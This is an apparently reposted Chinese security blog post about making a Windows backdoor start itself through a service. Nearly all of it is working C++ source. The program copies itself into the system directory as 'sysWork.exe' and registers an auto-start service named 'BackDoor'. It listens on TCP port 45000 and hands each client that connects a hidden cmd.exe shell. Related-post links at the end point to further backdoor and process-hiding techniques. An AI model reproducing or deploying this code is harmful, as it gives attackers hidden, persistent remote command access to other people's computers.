2. 程式人生 > >安全之路 —— C/C++實現後門的服務自啟動

安全之路 —— C/C++實現後門的服務自啟動

阿新 發佈:2018-08-24
net tom html 註冊表自啟動 bin hide any patch format

簡介

Windows NT系統後門要實現自啟動,有許多種方法,例如註冊表自啟動映像劫持技術SVCHost自啟動以及本章節介紹的服務自啟動等方法,其中服務自啟動相對於上述其他三種需要修改註冊表的啟動方式而言更不容易被發現。

C++代碼樣例

//////////////////////////////////////////////////////////////
//
// FileName : ServiceAutoRunDemo.cpp
// Creator : PeterZ1997
// Date : 2018-5-4 23:19
// Comment : Create Service to make the BackDoor Run Automatically
//
//////////////////////////////////////////////////////////////

#include <iostream>
#include <WinSock2.h>
#include <winsock.h>
#include <windows.h>
#include <Winsvc.h>
#include <cstdio>
#include <cstring>
#pragma comment(lib, "ws2_32.lib")

using namespace std;

#define SERVICE_OP_ERROR -1
#define SERVICE_ALREADY_RUN -2

const unsigned int MAX_COUNT = 255; /// String Max Length
const DWORD PORT = 45000;           /// Listen Port
const unsigned int LINK_COUNT = 30; /// Max Link Number

SERVICE_STATUS g_ServiceStatus;
SERVICE_STATUS_HANDLE g_hServiceStatus;

/**
 * @brief CallBack Function to Translate Service Control Code
 * @param dwCode Service Control Code
 */
void WINAPI ServiceControl(DWORD dwCode)
{
    switch (dwCode)
    {
        //服務暫停
    case SERVICE_CONTROL_PAUSE:
        g_ServiceStatus.dwCurrentState = SERVICE_PAUSED;
        break;
        //服務繼續
    case SERVICE_CONTROL_CONTINUE:
        g_ServiceStatus.dwCurrentState = SERVICE_RUNNING;
        break;
        //服務停止
    case SERVICE_CONTROL_STOP:
        g_ServiceStatus.dwCurrentState = SERVICE_STOPPED;
        g_ServiceStatus.dwWin32ExitCode = 0;
        g_ServiceStatus.dwCheckPoint = 0;
        g_ServiceStatus.dwWaitHint = 0;
        break;
    case SERVICE_CONTROL_INTERROGATE:
        break;
    default:
        break;
    }
    //設置服務狀態
    if (SetServiceStatus(g_hServiceStatus, &g_ServiceStatus) == 0)
    {
        printf("Set Service Status Error\n");
    }
    return;
}

/**
 * @brief Start Remote Shell
 * @lpParam the Client Handle
 */
DWORD WINAPI StartShell(LPVOID lpParam)
{
    STARTUPINFO si;
    PROCESS_INFORMATION pi;
    CHAR cmdline[MAX_COUNT] = { 0 };
    GetStartupInfo(&si);
    si.cb = sizeof(STARTUPINFO);
    si.hStdInput = si.hStdOutput = si.hStdError = (HANDLE)lpParam;
    si.dwFlags = STARTF_USESHOWWINDOW | STARTF_USESTDHANDLES;
    si.wShowWindow = SW_HIDE;
    GetSystemDirectory(cmdline, sizeof(cmdline));
    strcat_s(cmdline, sizeof(cmdline), "\\cmd.exe");
    while (!CreateProcess(NULL, cmdline, NULL, NULL, TRUE, NULL, NULL, NULL, &si, &pi))
    {
        Sleep(100);
    }
    WaitForSingleObject(pi.hProcess, INFINITE);
    CloseHandle(pi.hProcess);
    CloseHandle(pi.hThread);
    return 0;
}

/**
 * @brief Service Running Function
 * @lpParam NULL
 */
DWORD WINAPI RunService(LPVOID lpParam)
{
    CHAR wMessage[MAX_COUNT] = "<================= Welcome to Back Door >_< ==================>\n";
    SOCKET sClient[30];
    DWORD dwThreadId[30];
    HANDLE hThread[30];
    WSADATA wsd;
    if (WSAStartup(0x0202, &wsd))
    {
        printf("WSAStartup Process Error\n");
        return 0;
    }
    SOCKET sListen = WSASocket(AF_INET, SOCK_STREAM, IPPROTO_TCP, NULL, 0, 0);
    sockaddr_in sin;
    sin.sin_family = AF_INET;
    sin.sin_port = htons(PORT);
    sin.sin_addr.S_un.S_addr = INADDR_ANY;
    if (bind(sListen, (LPSOCKADDR)&sin, sizeof(sin))) return 0;
    if (listen(sListen, LINK_COUNT)) return 0;
    for (int i = 0; i < LINK_COUNT; i++)
    {
        sClient[i] = accept(sListen, NULL, NULL);
        hThread[i] = CreateThread(NULL, 0, StartShell, (LPVOID)sClient[i], 0, &dwThreadId[i]);
        send(sClient[i], wMessage, strlen(wMessage), 0);
    }
    WaitForMultipleObjects(LINK_COUNT, hThread, TRUE, INFINITE);
    return 0;
}

/**
 * @brief the Main Function of the Service
 */
void WINAPI ServiceMain(DWORD dwArgc, LPTSTR *lpArgv)
{
    HANDLE hThread;
    g_ServiceStatus.dwCheckPoint = 0;
    g_ServiceStatus.dwControlsAccepted = SERVICE_ACCEPT_PAUSE_CONTINUE | SERVICE_ACCEPT_STOP;
    g_ServiceStatus.dwCurrentState = SERVICE_START_PENDING;
    g_ServiceStatus.dwServiceSpecificExitCode = 0;
    g_ServiceStatus.dwServiceType = SERVICE_WIN32;
    g_ServiceStatus.dwWaitHint = 0;
    g_ServiceStatus.dwWin32ExitCode = 0;
    g_hServiceStatus = RegisterServiceCtrlHandler("BackDoor", ServiceControl);
    if (!g_hServiceStatus)
    {
        printf("Register Service Error\n");
        return;
    }
    g_ServiceStatus.dwCurrentState = SERVICE_RUNNING;
    g_ServiceStatus.dwCheckPoint = 0;
    g_ServiceStatus.dwWaitHint = 0;
    if (!SetServiceStatus(g_hServiceStatus, &g_ServiceStatus))
    {
        printf("Set ServiceStatus Error !\n");
        return;
    }
    hThread = CreateThread(NULL, 0, RunService, NULL, 0, NULL);
    if (!hThread)
    {
        printf("Create Thread Error\n");
    }
    return;
}

/**
 * @brief Install Service
 */
int APIENTRY InstallService()
{
    DWORD dwErrorCode;
    SC_HANDLE hscManager;
    SC_HANDLE hServiceHandle;
    SERVICE_STATUS ssServiceStatus;
    CHAR szSystemPath[MAX_COUNT] = "\0";
    CHAR szFileSelfPath[MAX_COUNT] = "\0";
    GetSystemDirectory(szSystemPath, sizeof(szSystemPath));
    GetModuleFileName(NULL, szFileSelfPath, sizeof(szFileSelfPath));
    strcat_s(szSystemPath, "\\sysWork.exe");
    CopyFile(szFileSelfPath, szSystemPath, true);
    hscManager = OpenSCManager(NULL, NULL, SC_MANAGER_ALL_ACCESS);
    if (!hscManager)
    {
        printf("Can not Open the Service Manager\n");
        return SERVICE_OP_ERROR;
    }
    printf("Service Manager Opened Success\n");
    hServiceHandle = CreateService(hscManager, "BackDoor", "BackDoor", SERVICE_ALL_ACCESS, SERVICE_WIN32_OWN_PROCESS, SERVICE_AUTO_START, SERVICE_ERROR_IGNORE, szSystemPath, NULL, NULL, NULL, NULL, NULL);
    if (!hServiceHandle)
    {
        dwErrorCode = GetLastError();
        if (dwErrorCode == ERROR_SERVICE_EXISTS)
        {
            hServiceHandle = OpenService(hscManager, "BackDoor", SERVICE_ALL_ACCESS);
            if (!hServiceHandle)
            {
                printf("Can not Create/Open Service\n");
                CloseServiceHandle(hServiceHandle);
                return SERVICE_OP_ERROR;
            }
            else
            {
                printf("Service Opened Success\n");
            }
        }
    }
    else {
        printf("Service Create Success\n");
    }
    if (!StartService(hServiceHandle, 0, NULL))
    {
        dwErrorCode = GetLastError();
        if (dwErrorCode == ERROR_SERVICE_ALREADY_RUNNING)
        {
            printf("SERVEICE IS ALREADY RUNNING\n");
            CloseServiceHandle(hServiceHandle);
            CloseServiceHandle(hscManager);
            return SERVICE_ALREADY_RUN;
        }
        else
        {
            printf("SERVEICE START ERROR\n");
            CloseServiceHandle(hServiceHandle);
            CloseServiceHandle(hscManager);
            return SERVICE_OP_ERROR;
        }
    }
    while (QueryServiceStatus(hServiceHandle, &ssServiceStatus))
    {
        if (ssServiceStatus.dwCurrentState == SERVICE_START_PENDING)
        {
            Sleep(100);
            continue;
        }
        if (ssServiceStatus.dwCurrentState != SERVICE_RUNNING)
        {
            printf("Service Start Process ERROR\n");
            CloseServiceHandle(hServiceHandle);
            CloseServiceHandle(hscManager);
            return SERVICE_OP_ERROR;
        }
        else
        {
            break;
        }
    }
    if (!QueryServiceStatus(hServiceHandle, &ssServiceStatus))
    {
        printf("Service Status Get Error\n");
        CloseServiceHandle(hServiceHandle);
        CloseServiceHandle(hscManager);
        return SERVICE_OP_ERROR;
    }
    printf("Service Start Success\n");
    CloseServiceHandle(hServiceHandle);
    CloseServiceHandle(hscManager);
    return 0;
}


/**
 * @brief Remove Service
 */
int RemoveService()
{
    SC_HANDLE hscManager;
    SC_HANDLE hServiceHandle;
    SERVICE_STATUS ssServiceStatus;
    hscManager = OpenSCManager(NULL, NULL, SC_MANAGER_ALL_ACCESS);
    if (!hscManager)
    {
        printf("Open Service Manager Error\n");
        return SERVICE_OP_ERROR;
    }
    printf("Open Service Manager Success\n");
    hServiceHandle = OpenService(hscManager, "BackDoor", SERVICE_ALL_ACCESS);
    if (!hServiceHandle)
    {
        printf("Open Service Error\n");
        return SERVICE_OP_ERROR;
    }
    printf("Open Service Success\n");
    if (QueryServiceStatus(hServiceHandle, &ssServiceStatus))
    {
        if (ssServiceStatus.dwCurrentState == SERVICE_RUNNING)
        {
            ControlService(hServiceHandle, SERVICE_CONTROL_STOP, &ssServiceStatus);
        }
    }
    else
    {
        printf("Service Status Get Error\n");
        CloseServiceHandle(hServiceHandle);
        CloseServiceHandle(hscManager);
        return SERVICE_OP_ERROR;
    }
    if (!DeleteService(hServiceHandle))
    {
        printf("Delete Service Error\n");
        CloseServiceHandle(hServiceHandle);
        CloseServiceHandle(hscManager);
        return SERVICE_OP_ERROR;
    }
    printf("Remove Service Success\n");
    CloseServiceHandle(hServiceHandle);
    CloseServiceHandle(hscManager);
    return 0;
}

/**
 * @brief main Function
 */
int main(int argc, char* argv[])
{
    SERVICE_TABLE_ENTRY svTable[] = {
        {(LPSTR)"BackDoor",ServiceMain},
        {NULL,NULL}
    };
    StartServiceCtrlDispatcher(svTable);
    if (argc == 2)
    {
        if (!stricmp(argv[1], "--install"))
        {
            if (InstallService() == SERVICE_OP_ERROR)
            {
                printf("[!]Service Operation Error\n");
            }
            else
            {
                printf("[*]Service Operation Success\n");
            }
        }
        else if (!stricmp(argv[1], "--remove"))
        {
            if (RemoveService() == SERVICE_OP_ERROR)
            {
                printf("[!]Service Operation Error\n");
            }
            else
            {
                printf("[*]Service Operation Success\n");
            }
        }
        else
        {
            printf("[Usage] => *.exe [--install]/[--remove]\n");
        }
    }
    else {
        printf("[Usage] => *.exe [--install]/[--remove]\n");
    }
    return 0;
}

安全之路 —— C/C++實現後門的服務自啟動

相關推薦

安全 —— 利用SVCHost.exe系統服務實現後門啟動

cas default wait cal tis lis success 放置 簡介 簡介 在Windows系統中有一個系統服務控制器,叫做SVCHost.exe,它可以用來管理系統的多組服務。它與普通的服務控制不同的是它采用dll導出的ServiceMain主函數實現服

c#程式碼實現軟體開機啟動

// LaunchOnBoot是int型別的變數,0:開機不自啟;1:開機自啟  System.Security.Principal.WindowsIdentity identity = System.Security.Principal.WindowsIdentity.

安全 —— C/C++實現後門服務啟動

net tom html 註冊表自啟動 bin hide any patch format 簡介 Windows NT系統後門要實現自啟動,有許多種方法,例如註冊表自啟動,映像劫持技術,SVCHost自啟動以及本章節介紹的服務自啟動等方法,其中服務自啟動相對於上述其他三種

安全 —— C++實現進程守護

之前 aps serve query value isa process read subst 簡介 所謂進程守護,就是A進程為了保護自己不被結束,創建了一個守護線程來保護自己,一旦被結束進程,便重新啟動。進程守護的方法多被應用於惡意軟件,是一個保護自己進程的一個簡單方式

安全 —— C++實現程序守護

簡介 所謂程序守護,就是A程序為了保護自己不被結束,建立了一個守護執行緒來保護自己,一旦被結束程序,便重新啟動。程序守護的方法多被應用於惡意軟體,是一個保護自己程序的一個簡單方式,在ring3下即可輕鬆實現。而建立守護執行緒的方法多采用遠端執行緒注入的方式,筆

C/C++知識回爐 全棧c

hello printf 無敵 特殊 導致 span height world! 指向 c語言講義 指針的重要性,有人說學c語言,沒有學過指針就相當於沒有學過c語言,而我很不幸,大學時代就是,學了c語言,但是沒有學指針 1 //c語言中函數要先聲明 後使用 我們要

C語言實現websocket服務

sockaddr extend ++i set strlen ner ace == perl Websocket Echo Server Demo 背景 嵌入式設備的應用開發大都依靠C語言來完成,我去研究如何用c語言實現websocket服務器也是為了在嵌入式設備中實現一個

安全 —— 利用端口復用技術隱藏後門端口

mil *** zcm 一位 標識 creator process count handle 簡介 前面我們介紹到我們可以用進程註入的方法,借用其他應用的端口收發信息,從而達到穿墻的效果,那麽今天介紹一種新的方法,叫做端口復用技術,他能夠與其他應用綁定同一個端口,但同時進

安全 —— 利用遠程線程註入的方法(使用DLL)實現穿墻與隱藏進程

pat 完整路徑 ystemd return cpi printf output inf server 簡介 大多數後門或病毒要想初步實現隱藏進程,即不被像任務管理器這樣典型的RING3級進程管理器找到過於明顯的不明進程,其中比較著名的方法就是通過遠程線程註

安全 —— 無DLL文件實現遠程線程註入

資源管理 dir 簡介 sdn wsize date process 地址 str 簡介 在之前的章節中,筆者曾介紹過有關於遠程線程註入的知識,將後門.dll文件註入explorer.exe中實現繞過防火墻反彈後門。但一個.exe文件總要在註入時捎上一個.d

程式設計菜鳥到大佬C語言程式(十二)

第十二天學習精要 遞迴初步 遞迴 一個函式,自己呼叫自己,就是遞迴。 # include <iostream> using namespace std; int factorial(int n) // 函式返回n的階乘 { if (n ==

研發C程式碼註釋引發的“血案”

出處:研發之路: C程式碼註釋引發的“血案” 沒有血案,但有些衝突。不是程式碼bug,我要講註釋風格。 這位看官,既然來了,且讀且評吧。故事是真實的,如有雷同純屬巧合。   事情是這樣的,有人離職,公司調我補缺。那個系統一直有個工程師在維護,參與該系統的新人來了又走,他始終泰若

我的技術轉型——從C++到Android (一)

作為一個程式設計師,學習是工作必不可少的一個環節,從學習新的API、類庫、IDE的使用到學習一種全新的開發語言,我們跟隨著時代的腳步不斷挑戰和改變著自己。而所謂技術轉型到底多大幅度才算,其實也很難說得清,我自工作開始先是從事了兩年多的C++開發,而後因工作需要轉而學習Android應用程式開發至今兩

C學習-使用C列印金字塔

#include <stdio.h> //for迴圈 func1(int height){ int width=1; int height_temp=1; for(;height_temp<=height;height_temp++){ for(width

程式設計師c++:第一課:格式與cout

程式設計師之路   先舉個例子: #include <iostream> //匯入iostream庫 using namespace std; //宣告名稱空間 int main()

程式設計菜鳥到大佬C語言程式(五)

第五天學習精要 關係運算符和邏輯表示式 關係運算符 六種關係運算符用於數值的比較:相等 ==、不等 !=、大於 >、小於 <、大於等於 >=、小於等於 <=。 比較的結果是bool型別,成立則為true,反之為false。

程式設計菜鳥到大佬C語言程式(六)

第六天學習精要 if語句 條件分支結構之if 語句 有時,並非所有的程式語句都要被順序執行到,會希望滿足某種條件就執行這部分語句,滿足另一條件就執行另一部分語句,這就需要“條件分支結構”。 依次計算表示式1、表示式2…只要碰到一個表示式i為真,則執行語

程式設計菜鳥到大佬C語言程式(七)

第七天學習精要 for迴圈 for迴圈語句 for迴圈一般用於將某段程式碼(語句組)重複執行若干次。 第一步:計算“表示式1”。 第二步:計算“表示式2”,若其值為true,則執行“{ }”中的語句組,然後轉到第三步;若為false,則不再執行“{}”中的

程式設計菜鳥到大佬C語言程式(八)

第八天學習精要 break語句和continue語句 break語句 可以出現在迴圈體中(for、 while、 do…while迴圈均可),其作用是跳出迴圈。 在多重迴圈的情況下,break語句只能跳出直接包含它的那一重迴圈。 例題:如果兩個不同

程式設計菜鳥到大佬C語言程式特別篇(一)

程式設計習題 迴圈例題選講 例1.乘方計算 給出一個整數a和一個正整數n,求乘方ana^nan。 輸入:一行,包含兩個整數a和n。 -1000000 <= a <= 1000000,1 <= n <= 10000。 輸出:一個整數,